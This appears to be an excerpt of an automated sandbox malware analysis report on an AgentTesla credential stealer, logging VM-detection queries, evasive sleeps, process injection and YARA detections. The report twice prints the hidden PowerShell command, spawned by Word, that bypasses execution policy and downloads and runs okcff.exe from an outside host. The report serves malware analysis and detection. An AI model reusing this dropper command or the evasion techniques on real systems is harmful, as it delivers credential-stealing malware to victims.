Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\okcff.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\okcff.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592 Thread sleep time: -33000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292 Thread sleep count: 302 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012 Thread sleep count: 9438 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108 Thread sleep count: 101 > 30
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\okcff.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\okcff.exe Window / User API: threadDelayed 9438
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\okcff.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\okcff.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\okcff.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\okcff.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects files into Windows application
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bypasses PowerShell execution policy
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla